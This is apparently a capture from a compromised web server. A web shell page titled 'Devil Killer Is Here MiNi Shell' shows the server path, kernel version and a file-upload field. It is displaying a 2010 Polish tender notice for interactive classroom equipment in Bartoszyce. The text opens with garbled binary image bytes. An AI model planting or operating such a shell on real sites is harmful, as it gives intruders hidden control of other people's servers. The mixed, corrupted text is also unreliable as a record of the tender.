JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100209/36536-N-2010.html

<p class="kh_header"><b>Bartoszyce: Jednorazowa dostawa wyposażenia do interaktywnych sal lekcyjnych</b><br>
<b>Numer ogłoszenia: 36536 - 2010; data zamieszczenia: 09.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Administracyjny Oświaty w Bartoszycach , ul. Kętrzyńska 22b, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 0-89 762-98-61, faks 0-89 762-98-61.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Jednorazowa dostawa wyposażenia do interaktywnych sal lekcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia realizowany jest zgodnie z:
       
Nazwa Programu: Regionalny Program Operacyjny Warmia i Mazury na lata  2007 - 2013  współfinansowany przez Europejski Fundusz Rozwoju Regionalnego
Działanie 3.1- Inwestycje w infrastrukturę edukacyjną Oś priorytetowa 3 Infrastruktura społeczna Nazwa projektu - Podniesienie jakości kształcenia w szkołach podstawowych i gimnazjach w Gminie Miejskiej Bartoszyce poprzez zakup wyposażenia do interaktywnych sal lekcyjnych. 1. Zamawiający  dopuszcza możliwości składania ofert częściowych na kompletne zadanie: zadanie nr 1 i zadanie nr 2. 2. Opis przedmiotu zamówienia:a)przedmiot zamówienia obejmuje jednorazową dostawę wyposażenia do interaktywnych sal lekcyjnych, szczegółowy opis przedmiotu zamówienia zawarty jest w pkt 2.1 b) Zamawiający dopuszcza oferowanie wyposażenia do interaktywnych sal lekcyjnych w materiały i urządzenia równoważne , pod warunkiem, że zagwarantują one realizację zadań w zgodzie z uzyskanym dofinansowaniem, zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w dokumentacji przetargowej, zostaną wcześniej uzgodnione i zaakceptowane przez zamawiającego oraz są tożsame pod względem:
gabarytów i konstrukcji (wielkość, rodzaj oraz liczba elementów składowych), 
charakteru użytkowego (tożsamość funkcji),charakterystyki materiałowej (rodzaj, właściwości fizyczne i jakość materiałów), parametrów technicznych wytrzymałość, trwałość, dane techniczne, charakterystyki liniowe, konstrukcje),parametrów bezpieczeństwa użytkowania,standardów emisyjnych.Zadanie nr 1 1) Ekrany elektryczne  szt    12 2) Tablice interaktywne  szt    11 3) Pilot do tablicy interaktywnej  szt  171  (system błyskawicznego sprawdzania testów)
4) Projektor    szt    56 Zadanie nr 2 1) Oprogramowanie MS OFFICE 2007         szt    50     STANDARD MOLP - licencja edukacyjna                           
2) Laptop (z oprogramowaniem)   szt    56 3) Głośniki do  komputera  szt    50    
2.1 Dostarczane  o minimalnych parametrach:  Ekran elektryczny
Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne ekranu elektrycznego Format 4:3 2.	Przekątna  Wymiary minimum 310 x 230 cm 3.Gwarancja	Minimum 12 miesięcy 4.	Montaż Możliwość montażu zarówno na ścianie jak i na suficie
5.		Powierzchnia	Powierzchnia biała z czarnymi ramkami wokół ekranu zwiększającymi kontrast oglądanego obrazu
6.		Inne	Ekran w całości musi chować się w kasecie, która zabezpiecza go przed kurzem, sterowanie pilotem bezprzewodowym.
      
Tablice interaktywne 

Lp.	Nazwa parametru	Wymagane minimalne parametry techniczne tablicy i oprogramowania
1.	Przekątna tablicy	Minimum 77
4.	Format tablicy	4:3
5.	Technologia	Rezystywna (dotykowa)
6.	Sposób obsługi	Bez konieczności dedykowanego narzędzia (technologia dotykowa - rezystywna - umożliwia obsługę w sposób dowolny: palcem, wskaźnikiem, piórem, rysikiem itp.)		
7.	Sposób podłączenia	USB 
8.	Pobór prądu	max 1.6W
9.	Waga tablicy	max 20 kg
10.	Powierzchnia	Matowa, umożliwiająca wykorzystywanie jak zwykłą tablicę sucho-ścieralną
11.	Rozdzielczość	9600 x 9600, min. 600 dpi
12.	Prędkość śledzenia	Min 5m  sek. (prędkość przesyłu dla pisania klikania min 480 pkt.sek.)
13.	Dołączone akcesoria	Dwa piórka, min 10 m kabel USB, zestaw do powieszenia na ścianie, płyta ze sterownikami, oprogramowanie, instrukcja
14.	Inne funkcje	Wybór kolorów za pomocą przycisków skrótowych. Przyciski funkcyjne, takie same z prawej i lewej strony tablicy (na krawędzi), umożliwiające: stworzenie nowej strony prezentacji, zapis obszaru roboczego, funkcja cofnij/powtórz, tryb myszy, tryby pisania rysowania w różnych kolorach (wymagane podstawowe - czarny, czerwony, zielony, niebieski), tryb gumki, kalibracja oraz włączenie oprogramowania.
15.	Wsparcie systemów operacyjnych	Windows XP 2003 Vista 7,  Linux, Mac 10.X
16.	Certyfikaty i standardy	Deklaracja zgodności CE (załączyć do oferty)
Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia producenta urządzenia (załączyć do oferty)
WEEE Procedure (załączyć dokument potwierdzający spełnianie wymogu)
17.	Gwarancja	Minimum 12 miesięcy
18.	Oprogramowanie załączone przez producenta tablicy	W języku polskim, możliwość archiwizacji notatek do popularnych formatów plików DOC, PPT, XLS, PDF, HTML, PDF, BMP, EMS, WMS, GIF, CDF, TIF, PNG
Tryb myszy komputerowej oraz tryb graficzny. 
Funkcje powiększenia obrazu, kurtyny pionowej i poziomej, rozpoznawanie pisma odręcznego, automatyczna korekcja kształtów, wirtualne przybory: linijka, ekierka, cyrkiel. Biblioteka zasobów, obrazów i klipartów.
Wypełnianie kształtów, transformacja wielkości obiektów oraz możliwość ich obracania. Pasek narzędziowy z możliwością przenoszenia go w dowolne miejsce ekranu oraz jego minimalizacji. Automatyczne zapisywanie w formacie video pracy na poszczególnych stronach. Możliwość zapisu notatek w formacie video wraz z dźwiękiem (z mikrofonu).
19.Narzędzia nauczania	Obejmują: linijkę, kątomierz, ekierkę, cyrkle, wykresy słupkowe, wykresy w formie koła danych statystycznych, oznaczenia kątów rozmiarów etc. Dostępna jest również biblioteka figur z różnych dziedzin dla łatwego rysowania np. ozdobnych linii, obwódek, funkcji, łuków, schematów blokowych, listów, numeracji etc. Kolor, cień, lity wklęsły - każdy z tych atrybutów może zostać zdefiniowany. Poza tym użytkownik może korzystać z obszernej biblioteki obrazków z różnych dziedzin.
20.	Narzędzia prezentacyjne	Obejmują: funkcję zrzutu ekranu, reflektor punktowy (z możliwością edycji jego kształtu), zakrywanie   odkrywanie ekranu (w dowolnej konfiguracji z możliwością zdefiniowania czasu zaczernienia), strzałkę ekranową,  kostkę, kalkulator, szkło powiększające (z możliwością edycji jego kształtu i stopnia powiększenia), klawiaturę ekranową .
21.	Praca na obiektach	Każdy pojedynczy obiekt jak i grupę obiektów można obracać, grupować, sortować, użyć jako tła, użyć jako odnośnika, przeciągnąć i zapisać jako ulubiony.
22.	Import i eksport plików	Możliwość otwierania plików graficznych w formacie: BMP, EMF, WMF, TIF, JPG, GIF, PNG; dokumentów: TXT, DOC, PPT, XLS. Materiał stworzony na tablicy można zapisać w formacie PDF, HTML, CDF oraz w powyżej wymienionych formatach.
23.	Odtwarzanie multimediów	Możliwość odtwarzania plików: MP3, WAV, WMV, MOV, AVI, DAT, MPG, MPEG, ASF, MPG, RM, RMVB, VOB, SWF bezpośrednio z poziomu tablicy. Możliwość rysowania po zatrzymanym materiale filmowym.
24.	Rozpoznawanie pisma i kształtów	Rozpoznawanie pisma odręcznego, linii i figur.
25.	Zapisywanie pisma odręcznego	Wsparcie dla bezpośredniego zapisu pisma odręcznego w trybie edycji WORDa, EXCEL a oraz w trybie odtwarzania slajdów PowerPoint.
26.	Funkcja nagrywania czynności wykonywanych na tablicy	Możliwość cofania powtarzania krok po kroku tego co działo się na tablicy.
27.	Nagrywanie zrzutu ekranowego	Możliwość nagrywania do pliku AVI, dostępne narzędzia do przekonwertowania nagranego pliku do format SWF, WMV, EXE.
28.	Dodatkowe funkcje	Prawy  lewy przycisk myszy
Pojedyncze  podwójne kliknięcie w celu otworzenia
Zróżnicowane narzędzia pisaka: ołówek, pióro, długopis, pędzel, rozmyty pędzel, szeroki pędzel. Możliwość ustawienia koloru, przeźroczystości, szerokości, efektu kursora.
Różne rodzaje gumki: okrągła, kwadratowa, obszarowa, w formie pętli, obiektowa oraz opcja wymazania całości.
Możliwość wprowadzenia tekstu odręcznie lub za pomocą klawiatury ekranowej.
Możliwość edycji czcionki tekstu, rozmiaru i koloru.
Możliwość wstawiania symboli.
Podstawowe funkcje edycji tekstu.
Możliwość importu tekstu do pól tekstowych z plików TXT lub ze schowka.
29.	Narzędzie tabeli	Możliwość ustawienia ilości kolumn wierszy.
Możliwość wstawiania tekstu w każdej komórce.
Możliwość edycji czcionki, jej rozmiaru i koloru.
Możliwość ustawienia koloru obramowania i jego szerokości.
Możliwość zmiany wielkości komórki.
Możliwość wypełnienia komórki kolorem lub obrazkiem
30.	Kształty	Możliwość użycia predefiniowanych kształtów takich jak: linia ciągła, linia kropkowana, linia składająca się z kropek i kresek, strzałki, kółka, prostokąt, elipsa, wielokąt (dla rysowania trójkątów, wielokątów i nieregularnych linii), romb, sześciokąt, równoległobok, trapez, pięciokąt, trójkąt równoramienny, trójkąt prostokątny.
Predefiniowane jak również odręcznie narysowane kształty można wypełnić kolorem.
Możliwość ustawienia grubości obramowania kształtu oraz jego przeźroczystości.
31.	Wykresy	Wykresy kołowe oraz słupkowe.
Możliwość ustawienia nazwy i wartości każdego sektora słupka, jego tytułu, efektu 3D, koloru tła, jego przeźroczystości i przyporządkowania linków do wykresów.
Możliwość ustawienia wielkości każdego z sektorów  słupków.
Możliwość wypełnienia każdego sektora  słupka kolorem
32.	Narzędzia wymiarów i kątów	Oznaczenia wymiarów, oznaczenia kątów, linijka, separator, ekierka. Linijka i ekierka mogą być powiększane pomniejszane w nieskończoność.
Możliwość ustawienia wielkości, jednostek, ilości miejsc po przecinku wymiarów i kątów.
Możliwość rysowania okręgów, łuków oraz wycinków o określonym promieniu.
Możliwość ustawienia grubości linii, koloru i przeźroczystości etykiet wymiarów i kątów.
33.	Ustawienia paska narzędzi	Możliwość blokowania  odblokowania paska, jego przenoszenia, zmiany stylu wyświetlania, minimalizowania, ukrywania, zmieniania umiejscowienia.
Możliwość samodzielnego ustawienia skrótów na pasku narzędziowym.
Możliwość dodawania skrótów innych aplikacji na pasku narzędziowym.
Automatyczne zapamiętywanie ostatnich ustawień.





System do testów  - 6 kompletów (4 x 30 pilotów, 1 x 31 pilotów, 1 x 20 pilotów)

Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne systemu do testów
1.		Funkcjonalności		Generator i drukowanie testów (tworzenie testów spersonalizowanych)
Testy na piloty (przeprowadzanie testów za pomocą pilotów)

2.		Ilość pilotów uczniowskich	6 zestawów 4 x 30 pilotów uczniowskich, 1 x 31 pilotów uczniowskich, 1 x 20 pilotów uczniowskich
3.		Odbiornik	1 w zestawie
4.		Wyświetlacz na pilotach	Tak, informacja zwrotna o zarejestrowaniu odpowiedzi przez system, numer pilota, wybrana odpowiedź, typ testu
5.		Potwierdzenie wysłania i odebrania udzielonej odpowiedzi	tak, z komunikatem na wyświetlaczu pilota
6.		Komunikacja pilotów z odbiornikiem	bezprzewodowa - fale radiowe, 2.4 GHz
7.		Komunikacja odbiornika z komputerem		USB
8.		Walizka na cały zestaw	1 szt. na zestaw
9.		Piloty i odbiornik	Automatyczne wykrywanie podłączonego odbiornika (tryb plug play)
Możliwość zgłaszania się do odpowiedzi za pomocą pilotów z wyświetlonym na ekranie komunikatem
Możliwość przeprowadzania testów wielokrotnego wyboru za pomocą pilotów
Możliwość zamiany pilota uczniowskiego podczas testowania na inny (zmiana przypisania pilota)
Statystyki odpowiedzi w trakcie testu (informacja ile padło głosów na poszczególne odpowiedzi)
Podgląd informacji o poprawności udzielonych odpowiedzi przez poszczególnych uczestników testu w trakcie testu
10.		Specyfikacja oprogramowania dla powyższych funkcjonalności	Licencja  dla całej jednostki edukacyjnej, na wszystkie komputery, dla wszystkich nauczycieli z danej jednostki edukacyjnej
Oprogramowanie w języku polskim
Odpowiadanie za pomocą komputera
Możliwość opracowania nowych funkcjonalności zgłoszonych przez użytkowników
Możliwość wyświetlenia wyników podsumowujących na koniec testu
Możliwość tworzenia i przyznawania skal ocen dla testu i ich automatyczne obliczanie po zakończonym teście
Możliwość przeprowadzania testów spersonalizowanych (z losowym zestawem pytań dla poszczególnych uczniów)
Możliwość rozbudowy o moduł obsługujący odpowiedzi na piloty
11.		Bezpieczeństwo		Szyfrowanie danych na poziomie bazy danych
Możliwość logowania za pomocą identyfikatora oraz hasła dostępu
Możliwość dodatkowego zabezpieczenia dostępu do danych z poziomu aplikacji za pomocą klucza USB z przypisaną do niego licencją (brak możliwości działania danej licencji po przekopiowaniu na inny klucz USB)
Praca na bazach danych: MySQL oraz Firebird
Możliwość nadania kont z uprawnieniami administratora pozwalającymi na tworzenie i zmianę struktury jednostki oraz import uczestników (uczniów)
Możliwość zakładania przez administratorów kont dla prowadzących umożliwiających dostęp do aplikacji w ramach swojego profilu (widoczność tylko swoich testów i wyników)
Możliwość udostępniania lub nie udostępniania testów innym użytkownikom (nauczycielom)
Możliwość przełączenia wersji językowej oprogramowania (na język polski oraz angielski)
Możliwość importowania uczniów z formatu CSV oraz .SOU
12.		Tworzenie testu		Możliwość tworzenia testu jednokrotnego i wielokrotnego wyboru
Możliwość definiowania i zmiany kolejności odpowiedzi w pytaniu
Możliwość dodania do pytania multimediów (obrazów, filmów lub dźwięków)
Możliwość dodania do treści pytania wzorów matematycznych lub obrazów
Możliwość udostępnienia przez prowadzącego stworzonego przez siebie testu innym prowadzącym
Możliwość eksportu i importu testów
Możliwość zaszyfrowania testu przy eksporcie
Możliwość przyznania punktów za pytanie
Możliwość przyznania części punktów za każdą prawidłową odpowiedź
Możliwość tworzenia i nadania testowi skali ocen
Możliwość określenia czasu na odpowiedź na pytanie (brak możliwości poruszania się po pytaniach w trakcie testu na komputerach, automatyczne przechodzenie do następnego pytania po zakończonym czasie)
Możliwość określenia czasu na cały test z pominięciem czasu na poszczególne odpowiedzi (możliwość poruszania się po pytaniach w trakcie testu na komputerach)
Możliwość drukowania testu
13.		Zarządzanie testem i testowanie	Możliwość określenia czasu (daty i godziny) rozpoczęcia i zakończenia dostępu do uruchomionego testu dla uczestników
Możliwość wydruku testu z zaznaczonymi prawidłowymi odpowiedziami
Możliwość zmiany czcionki i jej wielkości przy wydruku
Możliwość optymalizacji wydruku testu (pomniejszanie grafik, zmiana ilości kolumn odpowiedzi)
Możliwość wydruku testu zindywidualizowanego (automatycznie generowany test z wylosowaną kolejnością pytań i odpowiedzi dla określonej grupy osób)
Możliwość próbnego uruchomienia testu
Możliwość udzielania odpowiedzi za pomocą myszki i klawiatury
Możliwość powiększania multimediów dołączonych do pytania (obrazy, filmy)
Możliwość obserwowania statusu poszczególnych uczestników (zalogowany, w trakcie testowania,  zakończył, przerwał)
Automatyczne wyświetlanie wyniku punktowego, procentowego oraz oceny po zakończonym przez użytkownika teście
14.		Analiza wyników	Możliwość przeglądania i wydruku wyników dla całej grupy (procent poprawnych odpowiedzi dla poszczególnych uczestników testu)
Możliwość przeglądania i wydruku wyników dla poszczególnego uczestnika (z zaznaczonymi przez niego odpowiedziami)
Możliwość przeglądania i wydruku wyników z danego testu w kontekście jednej grupy (procentowy rozkład poprawnych odpowiedzi na poszczególne pytania)
Możliwość przeglądania i wydruku wyników z danego testu w kontekście wielu grup (procentowy rozkład zdawalności z tego samego testu wśród różnych grup)
Możliwość filtrowania wyników po dacie przeprowadzenia testu
Możliwość filtrowania wyników po przedmiocie
Możliwość eksportu wyników do pliku XML
15.		Certyfikaty	Certyfikat CE (należy załączyć do oferty)
16.	Gwarancja	Minimum 12 miesięcy


Projektor z uchwytem 

Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne projektora
1.		Technologia	DLP
short-throw, czyli tzw krótkiego rzutu
2.		Jasność	Min. 2200 ANSI Lumenów
3.		Kontrast	Min 2500:1
4.		Żywotność lampy	4000h  3000h (Tryb Eco  Standard)
5.		Pilot	Tak, 
6.		Źródła wejściowe	PC
Analog RGB: D-sub 15 pin x 1
AV
Digital : HDMI x 1
Component video: D-sub 15 pin x 1 (dzielony z Analog RGB D-Sub)
S-Video: Mini Din 4 pin x 1
Composite video: RCA x 1
Audio 
Stereo Mini Jack x 1
7.		Gwarancja 	Minimum 12 miesięcy na projektor, min. 6 miesięcy na lampę (lub 1000 godzin)
8.		Zestaw do montażu sufitowego	Z regulacją długości minimum w zakresie 70-120 cm, z regulacją kąta nachylenia (minimum 30) i obrotu (360 stopni), maksymalne obciążenie min 12 kg, możliwość ukrycia kabli wewnątrz uchwytu, uniwersalne mocowanie projektorów
9.		Dodatkowa lampa 	Lampa o parametrach nie gorszych niż oryginalna w projektorze

Komputer przenośny 

Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne komputerów
1.		Ekran	Minimum 15 
2.		Procesor	procesor dwurdzeniowy klasy x86 dedykowany do pracy w komputerach przenośnych zaprojektowany do pracy w układach jednoprocesorowych, taktowany zegarem co najmniej 2,0 GHz, częstotliwość szyny systemowej 800MHz, pamięć podręczna 2 MB (Klasa procesora Intel Core 2 Duo) lub procesor równoważny wydajnościowo według wyniku testów przeprowadzonych przez Oferenta.

3.		Pamięć RAM	Minimum 2 GB, typ zastosowanej pamięci RAM: DDR2,DDR3
4.		Dysk twardy	Min. 250 GB SATA
5.		Karta graficzna	z obsługą DirectX 10, Microsoft Windows Vista Aero, Pixel Shader 4.0, 
6.		Wyjścia karty graficznej:	wyjście HDMI, wyjście D-Sub;
7.		Audio	zintegrowana
8.		Karta sieciowa	Minimum 100 Mbps - RJ 45
9.		Łączność bezprzewodowa	Wbudowany Wireless 802.11 bg 
Wbudowany moduł Bluetooth
10.		Porty złącza	czytnik kart 
FireWire (port IEEE1394)
11.		Klawiatura	Klawiatura (układ QWERTY)
12.		Napęd optyczny	Nagrywarka DVD wraz z niezbędnym oprogramowaniem do nagrywania i odtwarzania
13.		System operacyjny	Windows 7 Professional lub Vista Business lub XP mające prawo do upgradu do właściwej wersji Windows 7 Professional.
14.		Gwarancja	Minimum 12 miesięcy 
15.		Dodatkowe oprogramowanie	Oprogramowanie antywirusowe z subskrypcją na aktualizację bazy wirusów na min. dwa lata.

 Głośniki komputerowe 

Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne głośników
1.		Głośniki w systemie	2.0
2.		Ilość głośników	2 głośniki 
3.		Moc całkowita RMS	min. 30 watów (RMS) 
4.		Gwarancja	Minimum 12 miesięcy

        
Wykonawca ma obowiązek dostarczyć ww sprzęt  do siedziby zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających 
     stanowiących nie więcej niż 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5, 38.65.21.00-1, 66.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
      dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
      granicznego - spełnia niespełna.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
      dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
      granicznego - spełnia niespełna.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
      dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
      granicznego - spełnia niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
      dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
      granicznego - spełnia niespełna.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o 
      dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku 
      granicznego - spełnia niespełna.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

